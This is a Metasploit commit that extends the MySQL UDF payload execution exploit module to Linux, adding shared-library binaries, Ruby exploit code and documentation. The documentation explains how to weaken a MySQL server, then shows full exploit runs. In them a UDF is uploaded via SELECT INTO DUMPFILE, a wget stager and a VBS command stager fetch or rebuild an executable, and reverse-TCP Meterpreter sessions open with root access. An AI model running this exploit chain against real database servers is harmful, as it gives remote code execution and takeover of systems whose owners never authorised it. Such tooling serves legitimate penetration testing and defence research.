Land #9170, Linux UDF for mysql_udf_payload

2017-12-21 20:48:24 -06:00 · 2017-12-21 20:48:24 -06:00 · caae33b417
parent 909caa0425 c9e3b8816b
commit caae33b417
5 changed files with 206 additions and 10 deletions
--- a/data/exploits/mysql/lib_mysqludf_sys_32.so
+++ b/data/exploits/mysql/lib_mysqludf_sys_32.so
--- a/data/exploits/mysql/lib_mysqludf_sys_64.so
+++ b/data/exploits/mysql/lib_mysqludf_sys_64.so
--- a/documentation/modules/exploit/multi/mysql/mysql_udf_payload.md
+++ b/documentation/modules/exploit/multi/mysql/mysql_udf_payload.md
@ -0,0 +1,175 @@
 ## Vulnerable Application
 This vulnerability expoits mysql by adding a .so or .dll file which has a system call in it to the plugins folder.
 The file is then loaded by mysql, and arbitrary commands can be run.  There are several caveats for this to
 function however, including:
 1. `secure_file_priv`, a mysql setting, must be changed from the default to allow writing
 to mysql's plugins folder
 2. on Ubuntu, apparmor needs a bunch of exceptions added, or to be disabled.  Equivalents on other linux systems most likely need the same
 3. the mysql folder must be writable
 ### Linux (Ubuntu 16.04 x64) Configuration
 In this configuration, we'll run mysql as root so we have a priv escalate.
 1. Edit `/lib/systemd/system/mysql.service` and set `User=root`
 2. Edit `/etc/mysql/mysql.conf.d/mysqld.cnf`.  After the `[mysqld]` section, change `user=mysql` to `user=root` 
 3. Edit `/etc/mysql/mysql.conf.d/mysqld.cnf`.  After the `[mysqld]` section, add `secure_file_priv=""` 
 4. Disable app-armor for mysql: `sudo apparmor_parser -R /etc/apparmor.d/usr.sbin.mysqld`
 5. Restart mysql service: `sudo systemctl restart mysql.service`
 If you need to make the root user accessible remotely
 ```
 GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED by 'password';
 FLUSH PRIVILEGES;
 ```
 or
 ```
 update user set host='%' where host='127.0.0.1';
 ```
 ### Windows (Server 2012 x64) Configuration
 One good reference for these instructions is [PR #5334](https://github.com/rapid7/metasploit-framework/pull/5334)
  1. Download and install mysql installer
  2. Install dependencies including, at the time of writing, Visual C++ 2013 Redistributable Package.
  3. Edit `C:\ProgramData\MySQL\MySQL Server\MySQL Server *\my.ini` and change the value of `secure-file-priv=` to `""`
  4. Make the `C:\Program Files\MySQL\MySQL Server *\lib\plugin` folder permissions writable by the MySQL (service) user.
 If you need to make the root user accessible remotely
 ```
 GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED by 'password';
 FLUSH PRIVILEGES;
 ```
 or
 ```
 update user set host='%' where host='127.0.0.1';
 ```
 ## Verification Steps
  1. Install MySQL and make it vulnerable as described above
  2. Start msfconsole
  3. Do: ```use exploit/multi/mysql/mysql_udf_payload```
  4. Do: ```set rhost [ip]```
  5. Do: ```set srvhost [ip]```
  6. Make sure target and payload are correct
  7. Set mysql login information
  8. Do: ```exploit```
  9. You should get a shell.
 ## Options
  **FORCE_UDF_UPLOAD**
  This option will force the uploading of a UDF dll/so file even if one exists which has a system call already
 ## Scenarios
 ### Ubuntu 16.04 with MySQL 5.7.20
 In this case, the service has been configured as noted in the first section of this document, a remotely accessible MySQL running as root.
 ```
 [*] Processing udf.rc for ERB directives.
 resource (udf.rc)> use exploit/multi/mysql/mysql_udf_payload
 resource (udf.rc)> set payload linux/x86/meterpreter/reverse_tcp
 payload => linux/x86/meterpreter/reverse_tcp
 resource (udf.rc)> set lhost 1.1.1.1
 lhost => 1.1.1.1
 resource (udf.rc)> set rhost 2.2.2.2
 rhost => 2.2.2.2
 resource (udf.rc)> set srvhost 1.1.1.1
 srvhost => 1.1.1.1
 resource (udf.rc)> set srvport 64423
 srvport => 64423
 resource (udf.rc)> set password wordpress
 password => wordpress
 resource (udf.rc)> set target 1
 target => 1
 resource (udf.rc)> set verbose true
 verbose => true
 msf exploit(mysql_udf_payload) > exploit
 [*] Started reverse TCP handler on 1.1.1.1:4444 
 [*] 2.2.2.2:3306 - Checking target architecture...
 [*] 2.2.2.2:3306 - Checking for sys_exec()...
 [*] 2.2.2.2:3306 - sys_exec() already available, using that (override with FORCE_UDF_UPLOAD).
 [*] 2.2.2.2:3306 - Using URL: http://1.1.1.1:64423/YMDYyVp1fG
 [*] 2.2.2.2:3306 - Client 2.2.2.2 (Wget/1.17.1 (linux-gnu)) requested /YMDYyVp1fG
 [*] 2.2.2.2:3306 - Sending payload to 2.2.2.2 (Wget/1.17.1 (linux-gnu))
 [*] Transmitting intermediate stager...(106 bytes)
 [*] Sending stage (826872 bytes) to 2.2.2.2
 [*] Meterpreter session 4 opened (1.1.1.1:4444 -> 2.2.2.2:46330) at 2017-10-30 23:22:08 -0400
 [-] 2.2.2.2:3306 - Exploit failed: Rex::StreamClosedError Stream #<Socket:0x00561e7e1758e8> is closed.
 [*] 2.2.2.2:3306 - Server stopped.
 [*] Exploit completed, but no session was created.
 msf exploit(mysql_udf_payload) > sessions -i 4
 [*] Starting interaction with 4...
 meterpreter > sysinfo
 Computer     : 2.2.2.2
 OS           :  (Linux 4.4.0-98-generic)
 Architecture : x64
 Meterpreter  : x86/linux
 meterpreter > getuid
 Server username: uid=0, gid=0, euid=0, egid=0
 ```
 ### Windows Server 2012 with MySQL 5.7.20
 ```
 [*] Processing udf.rc for ERB directives.
 resource (udf.rc)> use exploit/multi/mysql/mysql_udf_payload
 resource (udf.rc)> set lhost 1.1.1.1
 lhost => 1.1.1.1
 resource (udf.rc)> set srvhost 1.1.1.1
 srvhost => 1.1.1.1
 resource (udf.rc)> set srvport 64423
 srvport => 64423
 resource (udf.rc)> set verbose true
 verbose => true
 msf exploit(mysql_udf_payload) > set target 0
 target => 0
 msf exploit(mysql_udf_payload) > set payload windows/meterpreter/reverse_tcp
 payload => windows/meterpreter/reverse_tcp
 msf exploit(mysql_udf_payload) > set rhost 3.3.3.3
 rhost => 3.3.3.3
 msf exploit(mysql_udf_payload) > set password mysql
 password => mysql
 msf exploit(mysql_udf_payload) > exploit
 [*] Started reverse TCP handler on 1.1.1.1:4444 
 [*] 3.3.3.3:3306 - Checking target architecture...
 [*] 3.3.3.3:3306 - Checking for sys_exec()...
 [*] 3.3.3.3:3306 - Checking target architecture...
 [*] 3.3.3.3:3306 - Checking for MySQL plugin directory...
 [*] 3.3.3.3:3306 - Target arch (win64) and target path both okay.
 [*] 3.3.3.3:3306 - Uploading lib_mysqludf_sys_64.dll library to C:/Program Files/MySQL/MySQL Server 5.7/lib/plugin/jfAzUfJP.dll...
 [*] 3.3.3.3:3306 - Checking for sys_exec()...
 [*] 3.3.3.3:3306 - Executing: echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACTOPDW11mehddZnoXXWZ6FrEWShdNZnoVURZCF3lmehbhGlIXcWZ6FuEaahdRZnoXXWZ+FHlmehVRRw4XfWZ6Fg3quhf9ZnoUQX5iF1lmehVJpY2jXWZ6FAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQAyzSjSgAAAAAAAAAA4AAPAQsBBgAAsAAAAKAAAAAAAAB2HwAAABAAAADAAAAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAAAAAAAGABAAAQAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAbMcAAHgAAAAAUAEAyAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAODBAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAADgAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAABmqQAAABAAAACwAAAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAA5g8AAADAAAAAEAAAAMAAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAFxwAAAA0AAAAEAAAADQAAAAAAAAAAAAAAAAAABAAADALnJzcmMAAADIBwAAAFABAAAQAAAAEAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\EkEiJ.b64
 [*] 3.3.3.3:3306 - Command Stager progress -   1.47% done (1499/102246 bytes)
 ```
 ...snip...
 ```
 [*] 3.3.3.3:3306 - Executing: echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\EkEiJ.b64
 [*] 3.3.3.3:3306 - Command Stager progress -  96.76% done (98934/102246 bytes)
 [*] 3.3.3.3:3306 - Executing: echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATkIxMAAAAAA2gMFKAQAAAEM6XGxvY2FsMFxhc2ZccmVsZWFzZVxidWlsZC0yLjIuMTRcc3VwcG9ydFxSZWxlYXNlXGFiLnBkYgA=>>%TEMP%\EkEiJ.b64 & echo Set fs = CreateObject("Scripting.FileSystemObject") >>%TEMP%\GTKoi.vbs & echo Set file = fs.GetFile("%TEMP%\EkEiJ.b64") >>%TEMP%\GTKoi.vbs & echo If file.Size Then >>%TEMP%\GTKoi.vbs & echo Set fd = fs.OpenTextFile("%TEMP%\EkEiJ.b64", 1) >>%TEMP%\GTKoi.vbs & echo data = fd.ReadAll >>%TEMP%\GTKoi.vbs & echo data = Replace(data, vbCrLf, "") >>%TEMP%\GTKoi.vbs & echo data = base64_decode(data) >>%TEMP%\GTKoi.vbs & echo fd.Close >>%TEMP%\GTKoi.vbs
 [*] 3.3.3.3:3306 - Command Stager progress -  98.19% done (100400/102246 bytes)
 [*] 3.3.3.3:3306 - Executing: echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("%TEMP%\CVVsw.exe", 2, True) >>%TEMP%\GTKoi.vbs & echo ofs.Write data >>%TEMP%\GTKoi.vbs & echo ofs.close >>%TEMP%\GTKoi.vbs & echo Set shell = CreateObject("Wscript.Shell") >>%TEMP%\GTKoi.vbs & echo shell.run "%TEMP%\CVVsw.exe", 0, false >>%TEMP%\GTKoi.vbs & echo Else >>%TEMP%\GTKoi.vbs & echo Wscript.Echo "The file is empty." >>%TEMP%\GTKoi.vbs & echo End If >>%TEMP%\GTKoi.vbs & echo Function base64_decode(byVal strIn) >>%TEMP%\GTKoi.vbs & echo Dim w1, w2, w3, w4, n, strOut >>%TEMP%\GTKoi.vbs & echo For n = 1 To Len(strIn) Step 4 >>%TEMP%\GTKoi.vbs & echo w1 = mimedecode(Mid(strIn, n, 1)) >>%TEMP%\GTKoi.vbs & echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>%TEMP%\GTKoi.vbs & echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>%TEMP%\GTKoi.vbs & echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>%TEMP%\GTKoi.vbs & echo If Not w2 Then _ >>%TEMP%\GTKoi.vbs & echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>%TEMP%\GTKoi.vbs & echo If  Not w3 Then _ >>%TEMP%\GTKoi.vbs & echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>%TEMP%\GTKoi.vbs & echo If Not w4 Then _ >>%TEMP%\GTKoi.vbs & echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>%TEMP%\GTKoi.vbs & echo Next >>%TEMP%\GTKoi.vbs & echo base64_decode = strOut >>%TEMP%\GTKoi.vbs & echo End Function >>%TEMP%\GTKoi.vbs & echo Function mimedecode(byVal strIn) >>%TEMP%\GTKoi.vbs
 [*] 3.3.3.3:3306 - Command Stager progress -  99.59% done (101827/102246 bytes)
 [*] 3.3.3.3:3306 - Executing: echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>%TEMP%\GTKoi.vbs & echo If Len(strIn) = 0 Then >>%TEMP%\GTKoi.vbs & echo mimedecode = -1 : Exit Function >>%TEMP%\GTKoi.vbs & echo Else >>%TEMP%\GTKoi.vbs & echo mimedecode = InStr(Base64Chars, strIn) - 1 >>%TEMP%\GTKoi.vbs & echo End If >>%TEMP%\GTKoi.vbs & echo End Function >>%TEMP%\GTKoi.vbs & cscript //nologo %TEMP%\GTKoi.vbs
 [*] 3.3.3.3:3306 - Command Stager progress - 100.00% done (102246/102246 bytes)
 [*] Sending stage (179267 bytes) to 3.3.3.3
 [*] Meterpreter session 5 opened (1.1.1.1:4444 -> 3.3.3.3:49165) at 2017-11-02 23:12:07 -0400
 meterpreter > sysinfo
 Computer        : WIN-OBKF2JFCDKL
 OS              : Windows 2012 (Build 9200).
 Architecture    : x64
 System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 1
 Meterpreter     : x86/windows
 ```
--- a/lib/msf/core/exploit/mysql.rb
+++ b/lib/msf/core/exploit/mysql.rb
@ -144,21 +144,32 @@ module Exploit::Remote::MYSQL
    binname = Rex::Text.rand_text_alpha(8)
    binpath = tmpdir << binname
    print_status "Uploading binary as #{binpath}..."
    print_status "SELECT #{blob} into DUMPFILE '#{binpath}'"
    res = mysql_query("SELECT #{blob} into DUMPFILE '#{binpath}'")
    return res
  end
  def mysql_upload_sys_udf(arch=:win32,target_path=nil)
-    fname = (arch == :win32 ? "lib_mysqludf_sys_32.dll" : "lib_mysqludf_sys_64.dll")
+    case arch
    when :win32
      fname = 'lib_mysqludf_sys_32.dll'
    when :win64
      fname = 'lib_mysqludf_sys_64.dll'
    when :linux32
      fname = 'lib_mysqludf_sys_32.so'
    when :linux64
      fname = 'lib_mysqludf_sys_64.so'
    end
    sys_dll = File.join( Msf::Config.data_directory, "exploits", "mysql", fname )
    data = File.open(sys_dll, "rb") {|f| f.read f.stat.size}
    blob = "0x"
    blob << data.unpack("C*").map {|x| "%02x" % [x]}.join
    dll_name = Rex::Text.rand_text_alpha(8)
-    target_dll = target_path << dll_name << ".dll"
+    [:win32, :win64].include?(arch) ? extension = '.dll' : extension = '.so'
    target_dll = target_path << dll_name << extension
    print_status "Uploading #{fname} library to #{target_dll}..."
    mysql_query("SELECT #{blob} into DUMPFILE '#{target_dll}'")
-    return dll_name << ".dll"
+    return dll_name << extension
  end
  def mysql_drop_and_create_sys_exec(soname)
@ -181,6 +192,15 @@ module Exploit::Remote::MYSQL
      :win64
    when /Win32/i
      :win32
    when /Linux/i
      # we need a second query to determine bits
      res = mysql_get_variable("@@version_compile_machine")
      return :unknown unless res
      if res =~ /x86_64/i
        :linux64
      else
        :linux32
      end
    else
      res
    end
@ -189,7 +209,7 @@ module Exploit::Remote::MYSQL
  def mysql_add_sys_exec
    arch = mysql_get_arch
    case arch
-    when :win64,:win32
+    when :win64,:win32,:linux64,:linux32
      target_path = mysql_get_plugin_dir
      if target_path
        print_status "Target arch (#{arch}) and target path both okay."
--- a/modules/exploits/multi/mysql/mysql_udf_payload.rb
+++ b/modules/exploits/multi/mysql/mysql_udf_payload.rb
@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
    super(
      update_info(
        info,
-        'Name'           => 'Oracle MySQL for Microsoft Windows Payload Execution',
+        'Name'           => 'Oracle MySQL UDF Payload Execution',
        'Description'    => %q{
          This module creates and enables a custom UDF (user defined function) on the
          target host via the SELECT ... into DUMPFILE method of binary injection. On
@ -27,7 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote
        'Author'         =>
          [
            'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
-            'todb' # this Metasploit module
+            'todb', # this Metasploit module
            'h00die' # linux addition
          ],
        'License'        => MSF_LICENSE,
        'References'     =>
@ -35,12 +36,12 @@ class MetasploitModule < Msf::Exploit::Remote
            # Bernardo's work with cmd exec via udf
            [ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ]
          ],
-        'Platform'       => 'win',
+        'Platform'       => ['win', 'linux'],
        'Targets'        =>
          [
-            [ 'Automatic', { } ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
+            [ 'Windows', {'CmdStagerFlavor' => 'vbs'} ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
            [ 'Linux', {'CmdStagerFlavor' => 'wget' } ]
          ],
        'CmdStagerFlavor' => 'vbs',
        'DefaultTarget'  => 0,
        'DisclosureDate' => 'Jan 16 2009' # Date of Bernardo's blog post.
    ))
@ -83,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
    if not m
      return
-    elsif not [:win32,:win64].include?(@mysql_arch)
+    elsif not [:win32,:win64,:linux64,:linux32].include?(@mysql_arch)
      print_status("Incompatible MySQL target architecture: '#{@mysql_arch}'")
      return
    else